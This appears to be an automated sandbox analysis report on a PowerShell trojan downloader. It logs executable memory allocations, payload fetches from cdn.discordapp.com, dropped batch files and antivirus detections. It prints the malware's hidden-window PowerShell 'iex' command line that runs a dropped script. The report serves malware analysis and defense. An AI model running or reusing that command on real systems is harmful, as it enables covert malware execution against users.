NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0677d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fa9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02782000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02861000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02862000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02783000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02784000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2024, 3:49 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\e040ju.bat'"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 24, 2024, 3:49 p.m.	thread_identifier: 2676 thread_handle: 0x000004cc process_identifier: 2672 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\e040ju.bat'" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000004c8	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 24, 2024, 3:49 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (4 events)

Data sent	uqfyôiÊÚjz $¼÷{zg]7¯h¬©ð *<`/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	uqfyô$¥x<®"PFÄSÂyNïþL½/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	uqfyõìFè3 Yðí$ !ãäô%0Rëãákg?y/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	uqfyõ¼4y(42×q¨ê§E(ìûOí}E+Zð5/5 ÀÀÀ À 280ÿcdn.discordapp.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 24, 2024, 3:49 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Drops a binary and executes it (1 event)

file	C:\Users\Public\secu.bat

File has been identified by 17 AntiVirus engines on VirusTotal as malicious (17 events)

Cynet	Malicious (score: 99)
VIPRE	Dropped:Trojan.Agent.GBLD
Sangfor	Trojan.Generic-Script.Save.4dc50a1c
Arcabit	Trojan.Agent.GBLD
ESET-NOD32	PowerShell/TrojanDownloader.Agent.FWQ
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	Dropped:Trojan.Agent.GBLD
MicroWorld-eScan	Dropped:Trojan.Agent.GBLD
Emsisoft	Dropped:Trojan.Agent.GBLD (B)
F-Secure	Trojan.TR/PShell.Dldr.VPA
FireEye	Dropped:Trojan.Agent.GBLD
Avira	TR/PShell.Dldr.VPA
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
GData	Dropped:Trojan.Agent.GBLD
MAX	malware (ai score=81)
AVG	Script:SNH-gen [Drp]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send June 24, 2024, 3:49 p.m.	buffer: uqfyôiÊÚjz $¼÷{zg]7¯h¬©ð *<`/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1544 sent: 122	1	122
send June 24, 2024, 3:49 p.m.	buffer: uqfyô$¥x<®"PFÄSÂyNïþL½/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1544 sent: 122	1	122
send June 24, 2024, 3:49 p.m.	buffer: uqfyõìFè3 Yðí$ !ãäô%0Rëãákg?y/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1472 sent: 122	1	122
send June 24, 2024, 3:49 p.m.	buffer: uqfyõ¼4y(42×q¨ê§E(ìûOí}E+Zð5/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1472 sent: 122	1	122

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\e040ju.bat'"
parent_process	powershell.exe	martian_process	C:\Users\Public\secu.bat
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\facoe83745.pdf

Creates a suspicious Powershell process (1 event)

option

-win hidden

value

Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

pumairld.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All